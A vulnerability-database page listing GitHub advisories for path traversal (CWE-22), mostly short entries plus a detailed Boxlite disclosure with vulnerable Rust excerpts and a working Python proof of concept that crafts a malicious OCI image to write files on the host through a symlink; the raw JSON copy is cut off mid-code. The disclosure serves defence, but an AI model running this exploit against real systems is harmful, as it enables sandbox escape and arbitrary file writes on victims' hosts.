Common Weakness Enumeration

CWE-22

Allowed-with-Review

Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

Abstraction: Base · Status: Stable

The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory.

13043 vulnerabilities reference this CWE, most recent first.

GHSA-F376-CRCR-9WFM

Vulnerability from github – Published: 2023-04-19 21:30 – Updated: 2024-04-04 03:36
VLAI
Details

In extractRelativePath of FileUtils.java, there is a possible way to access files in a directory belonging to other applications due to a path traversal error. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-12 Android-12L Android-13Android ID: A-228450832

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-21093"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-04-19T20:15:11Z",
    "severity": "HIGH"
  },
  "details": "In extractRelativePath of FileUtils.java, there is a possible way to access files in a directory belonging to other applications due to a path traversal error. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-12 Android-12L Android-13Android ID: A-228450832",
  "id": "GHSA-f376-crcr-9wfm",
  "modified": "2024-04-04T03:36:04Z",
  "published": "2023-04-19T21:30:27Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-21093"
    },
    {
      "type": "WEB",
      "url": "https://source.android.com/security/bulletin/2023-04-01"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-F37J-HRQW-74WX

Vulnerability from github – Published: 2022-05-17 00:41 – Updated: 2022-05-17 00:41
VLAI
Details

Directory traversal vulnerability in image.php in Barcode Generator 1D (barcodegen) 2.0.0 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the code parameter.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2008-5993"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2009-01-28T15:30:00Z",
    "severity": "HIGH"
  },
  "details": "Directory traversal vulnerability in image.php in Barcode Generator 1D (barcodegen) 2.0.0 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the code parameter.",
  "id": "GHSA-f37j-hrqw-74wx",
  "modified": "2022-05-17T00:41:55Z",
  "published": "2022-05-17T00:41:55Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2008-5993"
    },
    {
      "type": "WEB",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/45406"
    },
    {
      "type": "WEB",
      "url": "https://www.exploit-db.com/exploits/6558"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-F37Q-2CVQ-G869

Vulnerability from github – Published: 2022-05-24 16:45 – Updated: 2024-04-04 00:39
VLAI
Details

A vulnerability in the web-based management interface of Cisco Video Surveillance Manager could allow an unauthenticated, remote attacker to access sensitive information. The vulnerability is due to improper validation of parameters handled by the web-based management interface. An attacker could exploit this vulnerability by sending malicious requests to an affected component. A successful exploit could allow the attacker to download arbitrary files from the affected device, which could contain sensitive information.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2019-1717"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2019-05-15T17:29:00Z",
    "severity": "HIGH"
  },
  "details": "A vulnerability in the web-based management interface of Cisco Video Surveillance Manager could allow an unauthenticated, remote attacker to access sensitive information. The vulnerability is due to improper validation of parameters handled by the web-based management interface. An attacker could exploit this vulnerability by sending malicious requests to an affected component. A successful exploit could allow the attacker to download arbitrary files from the affected device, which could contain sensitive information.",
  "id": "GHSA-f37q-2cvq-g869",
  "modified": "2024-04-04T00:39:34Z",
  "published": "2022-05-24T16:45:43Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1717"
    },
    {
      "type": "WEB",
      "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190515-cvsm"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/108336"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-F396-4RP4-7V2J

Vulnerability from github – Published: 2026-05-21 21:54 – Updated: 2026-06-12 19:27
VLAI
Summary
Boxlite: Path Traversal Vulnerability Leads to Arbitrary File Write on the Host
Details

Summary

Boxlite is a sandbox service that allows users to create lightweight virtual machines (Boxes) and run OCI containers within them. Boxlite allows users to specify the OCI image used by containers in the sandbox. However, when processing tar entries in OCI images, Boxlite does not account for the possibility that entries may be symlinks pointing to absolute paths. An attacker can craft a malicious OCI image and distribute it on image hosting platforms such as DockerHub, tricking users into using it. Once a user loads the malicious image, the attacker can write arbitrary content to any path on the host, which can further lead to remote code execution on the host.

Details

  1. Entry Point — OCI Layer Tarball Extraction

File: boxlite/src/images/archive/tar.rs Function: extract_layer_tarball_streaming() (line 24) Code:

pub fn extract_layer_tarball_streaming(tarball_path: &Path, dest: &Path) -> BoxliteResult<u64> {
    // ...
    apply_oci_layer(reader, dest)
}

Issue: The function passes the tar reader into apply_oci_layer. The tarball comes from a registry blob that has passed SHA256 integrity verification against the manifest digest — but the manifest itself is controlled by the registry, so a malicious registry can serve a valid manifest pointing to a crafted layer blob with a matching digest.

  1. Main Extraction Loop — Symlink Created Without Target Validation

File: boxlite/src/images/archive/tar.rs Function: apply_oci_layer() (line 196) Code:

EntryType::Symlink => {
    let target = link_name.ok_or_else(|| { /* ... */ })?;
    create_symlink(&full_path, &target)?;  // line 327 — target is NOT validated
}

Issue: The symlink's full_path (the link itself) is sanitized by normalize_entry_path to stay within dest. However, the target (what the symlink points to) is never validated. An entry with path usr and link target /etc creates {dest}/usr -> /etc, a symlink pointing outside the extraction root. There is no check that target stays within dest, is relative, or doesn't escape the container root.

  1. Symlink Target Written Verbatim

File: boxlite/src/images/archive/tar.rs Function: create_symlink() (line 747) Code:

fn create_symlink(path: &Path, target: &Path) -> BoxliteResult<()> {
    std::os::unix::fs::symlink(target, path).map_err(|e| { /* ... */ })
}

Issue: std::os::unix::fs::symlink is an lstat-level operation — it creates the symlink with the provided target string verbatim, no matter what it contains. If target is /etc, the link records /etc as the target. No containment check.

  1. ensure_parent_dirs Deliberately Follows and Preserves Escape Symlinks

File: boxlite/src/images/archive/tar.rs Function: ensure_parent_dirs() (line 457) Code:

Ok(m) if m.file_type().is_symlink() => {
    // Check if symlink points to a directory
    match fs::metadata(current_check) {  // follows symlink
        Ok(target_m) if target_m.is_dir() => {
            trace!("Preserving symlink that points to directory: ...");
            break;  // line 516 — stop, keep the symlink, treat as valid parent
        }

Issue: When the next tar entry has path usr/passwd and the code calls ensure_parent_dirs("{dest}/usr/passwd", dest), it walks up to {dest}/usr, finds it is a symlink pointing to a directory (e.g., /etc), and explicitly breaks the loop to preserve it — treating the out-of-root symlink as a valid, navigable parent. The create_dir_all call is then skipped for this path. The caller proceeds to open and write {dest}/usr/passwd, which the kernel resolves through the symlink to /etc/passwd.

  1. File Written Through Escaped Symlink

File: boxlite/src/images/archive/tar.rs Function: create_regular_file() (line 715) Code:

fn create_regular_file<R: Read>(entry: &mut Entry<R>, path: &Path, mode: u32) -> BoxliteResult<()> {
    let mut file = OpenOptions::new()
        .write(true).create(true).truncate(true).mode(mode)
        .open(path)   // path = "{dest}/usr/passwd" which kernel follows to "/etc/passwd"
        .map_err(|e| { /* ... */ })?;
    io::copy(entry, &mut file)?;   // attacker-controlled content written to /etc/passwd
    Ok(())
}

Issue: OpenOptions::open() follows symlinks in path components by default. The kernel resolves {dest}/usr/passwd{dest}/usr is a symlink to /etc → file opened at /etc/passwd. Attacker-controlled tar entry content is copied there verbatim.

As seen from the code, when a tar entry is a symlink, Boxlite's security checks are insufficient. An attacker can exploit this vulnerability to achieve arbitrary file write once a user loads a maliciously crafted image. The write permission is consistent with the process privilege running the Boxlite service, which is commonly root on Linux. The attacker can further leverage this capability to achieve remote code execution, such as writing the attacker's public key into the host's authorized_keys.

PoC

  1. Install Boxlite following the official tutorial.

  2. Run the following Python script:

```python #!/usr/bin/env python3 """ PoC: BoxLite OCI Layer Extraction Symlink Escape =================================================

Vulnerability: boxlite/src/images/archive/tar.rs — extract_layer_tarball_streaming() Type: CWE-61 / CAPEC-132 — Symlink Following during tar extraction

Attack: OCI images consist of layer tarballs extracted on the host to build the ext4 base image. If the extractor follows a symlink without verifying the resolved path stays within the extraction root, an attacker can craft a tar like:

   [1] SYMLINK  escape  ->  /tmp          (points to host /tmp)
   [2] FILE     escape/poc/pwned.txt       (resolves via [1] to /tmp/poc/pwned.txt)

 KVM hardware isolation is irrelevant here — tar extraction happens in the host
 process before the VM ever starts.

Target write: /tmp/boxlite_host_escape/pwned.txt Expected isolation boundary: boxlite internal staging dir under /tmp """

import asyncio import hashlib import io import json import os import shutil import tarfile import time

TARGET_FILE = "/tmp/boxlite_host_escape/pwned.txt" OCI_LAYOUT_DIR = "/tmp/malicious_oci_layout"

# ── Helpers ───────────────────────────────────────────────────────────────────

def sha256hex(data: bytes) -> str: return hashlib.sha256(data).hexdigest()

def add_entry( tf: tarfile.TarFile, name: str, type_: bytes, linkname: str = "", data: bytes = b"", mode: int = 0o644, ): info = tarfile.TarInfo(name=name) info.type = type_ info.linkname = linkname info.size = len(data) info.mode = mode info.mtime = int(time.time()) tf.addfile(info, io.BytesIO(data) if data else None)

# ── Step 1: Build malicious OCI layer tar ─────────────────────────────────────

def build_layer_tar() -> bytes: """ Tar entries (order matters): [1] SYMLINK escape -> /tmp [2] DIR escape/boxlite_host_escape/ (resolves to /tmp/boxlite_host_escape/) [3] FILE escape/boxlite_host_escape/pwned.txt (resolves to /tmp/…/pwned.txt) [4] FILE etc/os-release (legitimate-looking decoy entries) """ payload = ( "===== BOXLITE SYMLINK ESCAPE: HOST FILESYSTEM WRITE =====\n" f"Written at: {time.strftime('%Y-%m-%d %H:%M:%S')}\n" f"Target: {TARGET_FILE}\n" "========================================================\n" ).encode()

   buf = io.BytesIO()
   with tarfile.open(fileobj=buf, mode="w") as tf:
       add_entry(tf, "escape", tarfile.SYMTYPE, linkname="/tmp", mode=0o777)
       add_entry(tf, "escape/boxlite_host_escape", tarfile.DIRTYPE, mode=0o755)
       add_entry(
           tf, "escape/boxlite_host_escape/pwned.txt", tarfile.REGTYPE, data=payload
       )
       add_entry(
           tf,
           "etc/os-release",
           tarfile.REGTYPE,
           data=b"ID=alpine\nVERSION_ID=3.19.0\n",
       )
   return buf.getvalue()

# ── Step 2: Build OCI image layout ───────────────────────────────────────────

def build_oci_layout(out_dir: str) -> None: blobs = os.path.join(out_dir, "blobs", "sha256") os.makedirs(blobs, exist_ok=True)

   def write_blob(data: bytes) -> tuple[str, int]:
       dgst = sha256hex(data)
       with open(os.path.join(blobs, dgst), "wb") as f:
           f.write(data)
       return dgst, len(data)

   layer_bytes = build_layer_tar()
   layer_dgst, layer_sz = write_blob(layer_bytes)

   config_bytes = json.dumps(
       {
           "architecture": "amd64",
           "os": "linux",
           "config": {"Cmd": ["/bin/sh"]},
           "rootfs": {"type": "layers", "diff_ids": [f"sha256:{layer_dgst}"]},
       }
   ).encode()
   cfg_dgst, cfg_sz = write_blob(config_bytes)

   manifest_bytes = json.dumps(
       {
           "schemaVersion": 2,
           "mediaType": "application/vnd.oci.image.manifest.v1+json",
           "config": {
               "mediaType": "application/vnd.oci.image.config.v1+json",
               "digest": f"sha256:{cfg_dgst}",
               "size": cfg_sz,
           },
           "layers": [
               {
                   "mediaType": "application/vnd.oci.image.layer.v1.tar",
                   "digest": f"sha256:{layer_dgst}",
                   "size": layer_sz,
               }
           ],
       }
   ).encode()
   mf_dgst, mf_sz = write_blob(manifest_bytes)

   with open(os.path.join(out_dir, "index.json"), "w") as f:
       json.dump(
           {
               "schemaVersion": 2,
               "manifests": [
                   {
                       "mediaType": "application/vnd.oci.image.manifest.v1+json",
                       "digest": f"sha256:{mf_dgst}",
                       "size": mf_sz,
                       "annotations": {"org.opencontainers.image.ref.name": "latest"},
                   }
               ],
           },
           f,
       )

   with open(os.path.join(out_dir, "oci-layout"), "w") as f:
       json.dump({"imageLayoutVersion": "1.0.0"}, f)

   print(f"  layer    sha256:{layer_dgst[:16]}…  ({layer_sz} B)")
   print(f"  config   sha256:{cfg_dgst[:16]}…  ({cfg_sz} B)")
   print(f"  manifest sha256:{mf_dgst[:16]}…  ({mf_sz} B)")

# ── Main ──────────────────────────────────────────────────────────────────────

async def main(): print("=" * 60) print(" PoC: BoxLite OCI Layer Extraction Symlink Escape") print("=" * 60)

   # Clean up previous run artifacts
   for path in [TARGET_FILE, "/tmp/boxlite_host_escape", OCI_LAYOUT_DIR]:
       if os.path.isfile(path):
           os.remove(path)
       elif os.path.isdir(path):
           shutil.rmtree(path)

   # [1] Build malicious OCI image
   print(f"\n[1] Building malicious OCI image → {OCI_LAYOUT_DIR}")
   build_oci_layout(OCI_LAYOUT_DIR)

   # [2] Show crafted tar entries
   print("\n[2] Malicious layer tar entries:")
   with open(os.path.join(OCI_LAYOUT_DIR, "index.json")) as f:
       idx = json.load(f)
   mf_dgst = idx["manifests"][0]["digest"].split(":")[1]
   with open(os.path.join(OCI_LAYOUT_DIR, "blobs", "sha256", mf_dgst)) as f:
       mf = json.load(f)
   lyr_dgst = mf["layers"][0]["digest"].split(":")[1]
   lyr_data = open(
       os.path.join(OCI_LAYOUT_DIR, "blobs", "sha256", lyr_dgst), "rb"
   ).read()
   with tarfile.open(fileobj=io.BytesIO(lyr_data)) as tf:
       for m in tf.getmembers():
           tstr = {
               tarfile.REGTYPE: "FILE   ",
               tarfile.SYMTYPE: "SYMLINK",
               tarfile.DIRTYPE: "DIR    ",
           }.get(m.type, f"?{m.type}   ")
           suffix = f" -> {m.linkname}" if m.issym() else ""
           print(f"    {tstr}  {m.name}{suffix}")

   # [3] Confirm target absent before exploit
   print(f"\n[3] Pre-exploit — target exists? {os.path.exists(TARGET_FILE)}")

   # [4] Trigger extraction (vulnerability fires before VM starts)
   print(f"\n[4] Loading malicious image via boxlite.SimpleBox(rootfs_path=…)")
   import boxlite

   try:
       async with boxlite.SimpleBox(rootfs_path=OCI_LAYOUT_DIR) as box:
           r = await box.exec("sh", "-c", "echo ok")
           print(f"    VM stdout: {r.stdout.strip()}")
   except Exception as e:
       # Box may fail to start (incomplete rootfs) — that's fine;
       # the symlink escape occurs during layer extraction, before VM launch.
       print(f"    Box error (expected): {type(e).__name__}: {e}")

   # [5] Verify host write
   print(f"\n[5] Post-exploit — target exists? {os.path.exists(TARGET_FILE)}")
   if os.path.exists(TARGET_FILE):
       print(f"\n  VULNERABLE — host file written successfully!")
       print(f"  Path: {TARGET_FILE}")
       print(open(TARGET_FILE).read())
   else:
       print("\n  NOT VULNERABLE (or already patched)")

if name == "main": asyncio.run(main()) ```

This script constructs a malicious OCI image and passes it to the SimpleBox function via rootfs_path to create a container. In the malicious image, a symlink is first created pointing escape to /tmp, and then files are written under escape, thereby achieving file writes to the root filesystem.

Sample output:

``` $ python3 poc_symlink_escape.py ============================================================ PoC: BoxLite OCI Layer Extraction Symlink Escape ============================================================

[1] Building malicious OCI image → /tmp/malicious_oci_layout layer sha256:a1e8b4de11d64fce… (10240 B) config sha256:8e245c2c65565998… (191 B) manifest sha256:2dad6671e78d8093… (415 B)

[2] Malicious layer tar entries: SYMLINK escape -> /tmp DIR escape/boxlite_host_escape FILE escape/boxlite_host_escape/pwned.txt FILE etc/os-release

[3] Pre-exploit — target exists? False

[4] Loading malicious image via boxlite.SimpleBox(rootfs_path=…) Box error (expected): RuntimeError: internal error: Container init failed: Failed to start container: internal error: Failed to create container b673b4e3400c71bd72464c98610c952e2164f70f946873b82adf3e6212851d54 at bundle /run/boxlite/containers/b673b4e3400c71bd72464c98610c952e2164f70f946873b82adf3e6212851d54: failed to create container: exec process failed with error error in executing process : PATH environment variable is not set

[5] Post-exploit — target exists? True

 VULNERABLE — host file written successfully!
 Path: /tmp/boxlite_host_escape/pwned.txt

===== BOXLITE SYMLINK ESCAPE: HOST FILESYSTEM WRITE ===== Written at: ... Target: /tmp/boxlite_host_escape/pwned.txt ======================================================== ```

Impact

An attacker can craft a malicious OCI image and distribute it on image hosting platforms such as DockerHub, tricking users into using it. Once a user loads the malicious image, the attacker can write arbitrary content to any path on the host, which can further lead to remote code execution on the host.

Score

Severity: Critical, Score: 9.7, rationale as follows:

  • AV:N — The attacker can distribute the malicious image over the network, tricking users into pulling and using it
  • AC:L — This is a logic vulnerability that requires no complex exploitation
  • PR:N — The attacker does not need any additional privileges to exploit this vulnerability
  • UI:R — The attacker needs to trick the victim into using the maliciously crafted image
  • S:C — The attacker can leverage the vulnerability to achieve arbitrary command execution on the host, extending the impact to the host operating system and crossing the security boundary
  • C:H/I:H/A:H — The attacker can leverage the vulnerability to gain RCE capability on the host, posing a significant threat to confidentiality, integrity, and availability

Credit

This vulnerability was discovered by:

  • XlabAI Team of Tencent Xuanwu Lab
  • Atuin Automated Vulnerability Discovery Engine

CVE and credit are preferred.

If you have any questions regarding the vulnerability details, please feel free to reach out to us for further discussion. Our email address is xlabai@tencent.com.

Note

Note that we follow the industry-standard 90+30 disclosure policy (Reference: https://googleprojectzero.blogspot.com/p/vulnerability-disclosure-policy.html). This means that we reserve the right to disclose the details of the vulnerability 30 days after the fix has been implemented.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "boxlite"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.9.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "crates.io",
        "name": "boxlite-cli"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.9.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "crates.io",
        "name": "boxlite"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.9.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "@boxlite-ai/boxlite"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.9.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/boxlite-ai/boxlite/sdks/go"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.9.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-46703"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-21T21:54:15Z",
    "nvd_published_at": "2026-06-10T23:16:47Z",
    "severity": "CRITICAL"
  },
  "details": "#### Summary\n\nBoxlite is a sandbox service that allows users to create lightweight virtual machines (Boxes) and run OCI containers within them. Boxlite allows users to specify the OCI image used by containers in the sandbox. However, when processing tar entries in OCI images, Boxlite does not account for the possibility that entries may be symlinks pointing to absolute paths. An attacker can craft a malicious OCI image and distribute it on image hosting platforms such as DockerHub, tricking users into using it. Once a user loads the malicious image, the attacker can write arbitrary content to any path on the host, which can further lead to remote code execution on the host.\n\n\n\n#### Details\n\n1. Entry Point \u2014 OCI Layer Tarball Extraction\n\n**File:** `boxlite/src/images/archive/tar.rs` **Function:** `extract_layer_tarball_streaming()` (line 24) **Code:**\n\n```rust\npub fn extract_layer_tarball_streaming(tarball_path: \u0026Path, dest: \u0026Path) -\u003e BoxliteResult\u003cu64\u003e {\n    // ...\n    apply_oci_layer(reader, dest)\n}\n```\n\n**Issue:** The function passes the tar reader into `apply_oci_layer`. The tarball comes from a registry blob that has passed SHA256 integrity verification against the manifest digest \u2014 but the manifest itself is controlled by the registry, so a malicious registry can serve a valid manifest pointing to a crafted layer blob with a matching digest.\n\n2. Main Extraction Loop \u2014 Symlink Created Without Target Validation\n\n**File:** `boxlite/src/images/archive/tar.rs` **Function:** `apply_oci_layer()` (line 196) **Code:**\n\n```rust\nEntryType::Symlink =\u003e {\n    let target = link_name.ok_or_else(|| { /* ... */ })?;\n    create_symlink(\u0026full_path, \u0026target)?;  // line 327 \u2014 target is NOT validated\n}\n```\n\n**Issue:** The symlink\u0027s `full_path` (the link itself) is sanitized by `normalize_entry_path` to stay within `dest`. However, the `target` (what the symlink points to) is never validated. An entry with path `usr` and link target `/etc` creates `{dest}/usr -\u003e /etc`, a symlink pointing outside the extraction root. There is no check that `target` stays within `dest`, is relative, or doesn\u0027t escape the container root.\n\n3. Symlink Target Written Verbatim\n\n**File:** `boxlite/src/images/archive/tar.rs` **Function:** `create_symlink()` (line 747) **Code:**\n\n```rust\nfn create_symlink(path: \u0026Path, target: \u0026Path) -\u003e BoxliteResult\u003c()\u003e {\n    std::os::unix::fs::symlink(target, path).map_err(|e| { /* ... */ })\n}\n```\n\n**Issue:** `std::os::unix::fs::symlink` is an `lstat`-level operation \u2014 it creates the symlink with the provided target string verbatim, no matter what it contains. If `target` is `/etc`, the link records `/etc` as the target. No containment check.\n\n4. ensure_parent_dirs Deliberately Follows and Preserves Escape Symlinks\n\n**File:** `boxlite/src/images/archive/tar.rs` **Function:** `ensure_parent_dirs()` (line 457) **Code:**\n\n```rust\nOk(m) if m.file_type().is_symlink() =\u003e {\n    // Check if symlink points to a directory\n    match fs::metadata(current_check) {  // follows symlink\n        Ok(target_m) if target_m.is_dir() =\u003e {\n            trace!(\"Preserving symlink that points to directory: ...\");\n            break;  // line 516 \u2014 stop, keep the symlink, treat as valid parent\n        }\n```\n\n**Issue:** When the next tar entry has path `usr/passwd` and the code calls `ensure_parent_dirs(\"{dest}/usr/passwd\", dest)`, it walks up to `{dest}/usr`, finds it is a symlink pointing to a directory (e.g., `/etc`), and explicitly **breaks** the loop to preserve it \u2014 treating the out-of-root symlink as a valid, navigable parent. The `create_dir_all` call is then skipped for this path. The caller proceeds to open and write `{dest}/usr/passwd`, which the kernel resolves through the symlink to `/etc/passwd`.\n\n5. File Written Through Escaped Symlink\n\n**File:** `boxlite/src/images/archive/tar.rs` **Function:** `create_regular_file()` (line 715) **Code:**\n\n```rust\nfn create_regular_file\u003cR: Read\u003e(entry: \u0026mut Entry\u003cR\u003e, path: \u0026Path, mode: u32) -\u003e BoxliteResult\u003c()\u003e {\n    let mut file = OpenOptions::new()\n        .write(true).create(true).truncate(true).mode(mode)\n        .open(path)   // path = \"{dest}/usr/passwd\" which kernel follows to \"/etc/passwd\"\n        .map_err(|e| { /* ... */ })?;\n    io::copy(entry, \u0026mut file)?;   // attacker-controlled content written to /etc/passwd\n    Ok(())\n}\n```\n\n**Issue:** `OpenOptions::open()` follows symlinks in path components by default. The kernel resolves `{dest}/usr/passwd` \u2192 `{dest}/usr` is a symlink to `/etc` \u2192 file opened at `/etc/passwd`. Attacker-controlled tar entry content is copied there verbatim.\n\n\n\nAs seen from the code, when a tar entry is a symlink, Boxlite\u0027s security checks are insufficient. An attacker can exploit this vulnerability to achieve arbitrary file write once a user loads a maliciously crafted image. The write permission is consistent with the process privilege running the Boxlite service, which is commonly root on Linux. The attacker can further leverage this capability to achieve remote code execution, such as writing the attacker\u0027s public key into the host\u0027s authorized_keys.\n\n\n\n#### PoC\n\n1. Install Boxlite following the official tutorial.\n\n2. Run the following Python script:\n\n   ```python\n   #!/usr/bin/env python3\n   \"\"\"\n   PoC: BoxLite OCI Layer Extraction Symlink Escape\n   =================================================\n   \n   Vulnerability: boxlite/src/images/archive/tar.rs \u2014 extract_layer_tarball_streaming()\n   Type:          CWE-61 / CAPEC-132 \u2014 Symlink Following during tar extraction\n   \n   Attack:\n     OCI images consist of layer tarballs extracted on the host to build the ext4\n     base image. If the extractor follows a symlink without verifying the resolved\n     path stays within the extraction root, an attacker can craft a tar like:\n   \n       [1] SYMLINK  escape  -\u003e  /tmp          (points to host /tmp)\n       [2] FILE     escape/poc/pwned.txt       (resolves via [1] to /tmp/poc/pwned.txt)\n   \n     KVM hardware isolation is irrelevant here \u2014 tar extraction happens in the host\n     process before the VM ever starts.\n   \n   Target write: /tmp/boxlite_host_escape/pwned.txt\n   Expected isolation boundary: boxlite internal staging dir under /tmp\n   \"\"\"\n   \n   import asyncio\n   import hashlib\n   import io\n   import json\n   import os\n   import shutil\n   import tarfile\n   import time\n   \n   TARGET_FILE = \"/tmp/boxlite_host_escape/pwned.txt\"\n   OCI_LAYOUT_DIR = \"/tmp/malicious_oci_layout\"\n   \n   \n   # \u2500\u2500 Helpers \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n   \n   \n   def sha256hex(data: bytes) -\u003e str:\n       return hashlib.sha256(data).hexdigest()\n   \n   \n   def add_entry(\n       tf: tarfile.TarFile,\n       name: str,\n       type_: bytes,\n       linkname: str = \"\",\n       data: bytes = b\"\",\n       mode: int = 0o644,\n   ):\n       info = tarfile.TarInfo(name=name)\n       info.type = type_\n       info.linkname = linkname\n       info.size = len(data)\n       info.mode = mode\n       info.mtime = int(time.time())\n       tf.addfile(info, io.BytesIO(data) if data else None)\n   \n   \n   # \u2500\u2500 Step 1: Build malicious OCI layer tar \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n   \n   \n   def build_layer_tar() -\u003e bytes:\n       \"\"\"\n       Tar entries (order matters):\n         [1] SYMLINK  escape            -\u003e  /tmp\n         [2] DIR      escape/boxlite_host_escape/     (resolves to /tmp/boxlite_host_escape/)\n         [3] FILE     escape/boxlite_host_escape/pwned.txt  (resolves to /tmp/\u2026/pwned.txt)\n         [4] FILE     etc/os-release    (legitimate-looking decoy entries)\n       \"\"\"\n       payload = (\n           \"===== BOXLITE SYMLINK ESCAPE: HOST FILESYSTEM WRITE =====\\n\"\n           f\"Written at: {time.strftime(\u0027%Y-%m-%d %H:%M:%S\u0027)}\\n\"\n           f\"Target: {TARGET_FILE}\\n\"\n           \"========================================================\\n\"\n       ).encode()\n   \n       buf = io.BytesIO()\n       with tarfile.open(fileobj=buf, mode=\"w\") as tf:\n           add_entry(tf, \"escape\", tarfile.SYMTYPE, linkname=\"/tmp\", mode=0o777)\n           add_entry(tf, \"escape/boxlite_host_escape\", tarfile.DIRTYPE, mode=0o755)\n           add_entry(\n               tf, \"escape/boxlite_host_escape/pwned.txt\", tarfile.REGTYPE, data=payload\n           )\n           add_entry(\n               tf,\n               \"etc/os-release\",\n               tarfile.REGTYPE,\n               data=b\"ID=alpine\\nVERSION_ID=3.19.0\\n\",\n           )\n       return buf.getvalue()\n   \n   \n   # \u2500\u2500 Step 2: Build OCI image layout \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n   \n   \n   def build_oci_layout(out_dir: str) -\u003e None:\n       blobs = os.path.join(out_dir, \"blobs\", \"sha256\")\n       os.makedirs(blobs, exist_ok=True)\n   \n       def write_blob(data: bytes) -\u003e tuple[str, int]:\n           dgst = sha256hex(data)\n           with open(os.path.join(blobs, dgst), \"wb\") as f:\n               f.write(data)\n           return dgst, len(data)\n   \n       layer_bytes = build_layer_tar()\n       layer_dgst, layer_sz = write_blob(layer_bytes)\n   \n       config_bytes = json.dumps(\n           {\n               \"architecture\": \"amd64\",\n               \"os\": \"linux\",\n               \"config\": {\"Cmd\": [\"/bin/sh\"]},\n               \"rootfs\": {\"type\": \"layers\", \"diff_ids\": [f\"sha256:{layer_dgst}\"]},\n           }\n       ).encode()\n       cfg_dgst, cfg_sz = write_blob(config_bytes)\n   \n       manifest_bytes = json.dumps(\n           {\n               \"schemaVersion\": 2,\n               \"mediaType\": \"application/vnd.oci.image.manifest.v1+json\",\n               \"config\": {\n                   \"mediaType\": \"application/vnd.oci.image.config.v1+json\",\n                   \"digest\": f\"sha256:{cfg_dgst}\",\n                   \"size\": cfg_sz,\n               },\n               \"layers\": [\n                   {\n                       \"mediaType\": \"application/vnd.oci.image.layer.v1.tar\",\n                       \"digest\": f\"sha256:{layer_dgst}\",\n                       \"size\": layer_sz,\n                   }\n               ],\n           }\n       ).encode()\n       mf_dgst, mf_sz = 